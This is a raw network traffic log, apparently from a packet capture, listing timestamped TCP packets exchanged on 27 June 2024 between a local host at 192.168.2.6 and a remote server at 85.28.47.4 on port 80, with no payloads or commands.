                                                                Jun 27, 2024 05:58:12.572592974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572596073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572611094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572613001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572626114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572628975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572642088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572658062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572659016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572659016 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572674036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572674990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572691917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572691917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572709084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572710037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572721958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572726011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572737932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572741985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572751045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572761059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572774887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572777987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.572794914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.572818041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573396921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573415995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573430061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573441982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573445082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573457956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573461056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573477030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573477983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573488951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573493004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573508024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573508024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573518991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573523998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573538065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573540926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573551893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573559046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573565006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573582888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573596954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573781013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573796034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573822021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573853016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573868990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573868990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573888063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573894024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573904037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573909998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573920965 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573920965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573936939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573940992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573955059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573956966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573967934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.573971987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.573992968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574007988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574337006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574362993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574378014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574385881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574393988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574397087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574409962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574410915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574426889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574434042 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574444056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574451923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574460030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574465990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574476004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574487925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574491978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574501991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574507952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574518919 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574522018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574537039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574547052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574563980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574892998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574908018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574922085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574933052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574938059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574953079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574954987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574970007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.574978113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.574985981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.575001955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.575004101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575026035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575048923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575819969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.575867891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575869083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.575886011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.575905085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575921059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.575987101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576003075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576019049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576028109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576035976 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576042891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576062918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576072931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576720953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576770067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576775074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576792002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576816082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576826096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576889992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576905966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576921940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576931953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576936960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576952934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576952934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.576961040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576977968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.576994896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657582045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657602072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657613993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657634020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657645941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657658100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657670975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657671928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657685041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657697916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657715082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657716990 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657738924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657756090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657869101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657881975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657892942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657906055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657917023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.657917023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657943964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.657958031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658128977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658142090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658154011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658166885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658176899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658180952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658200026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658211946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658397913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658411026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658421993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658433914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658442020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658453941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658457041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658468008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658482075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658483982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658493042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658508062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658509970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658520937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658535004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658539057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658549070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658555984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658574104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658597946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.658952951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658967018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.658997059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659007072 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659102917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659115076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659126043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659138918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659161091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659162045 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659172058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659174919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659188032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659190893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659207106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659214973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659224033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659235001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659243107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659248114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659262896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659269094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659276009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659286022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659290075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659301996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659312010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659315109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659337044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659354925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659800053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659811974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659822941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659845114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659863949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659940958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659954071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659965992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659979105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.659989119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.659991026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660002947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660010099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660022974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660054922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660090923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660104036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660115957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660128117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660132885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660141945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660152912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660155058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660166979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660177946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660181999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660187006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660195112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660207987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660219908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660219908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.660243034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.660257101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.754390001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.759565115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929486990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929524899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929538965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929550886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929579973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929593086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929687977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.929708004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929719925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929732084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929744005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929757118 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.929769039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.929799080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.929960966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929974079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929986000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.929997921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930001974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930011988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930022001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930023909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930037022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930047989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930054903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930061102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930063009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930095911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930110931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930269003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930296898 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930309057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930332899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930510998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930522919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930532932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930543900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930552959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930557013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930571079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930573940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930583000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930594921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930599928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930607080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930617094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930619955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930632114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930633068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930661917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930684090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.930965900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.930978060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931015968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931123018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931137085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931148052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931158066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931168079 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931170940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931184053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931185961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931195974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931210995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931214094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931222916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931235075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931242943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931246996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931257010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931261063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931274891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931292057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931312084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931838036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931849957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931860924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931873083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931879997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931885004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931893110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931898117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931910038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931921005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931921959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931932926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931942940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931947947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931956053 CEST804971185.28.47.4192.168.2.6
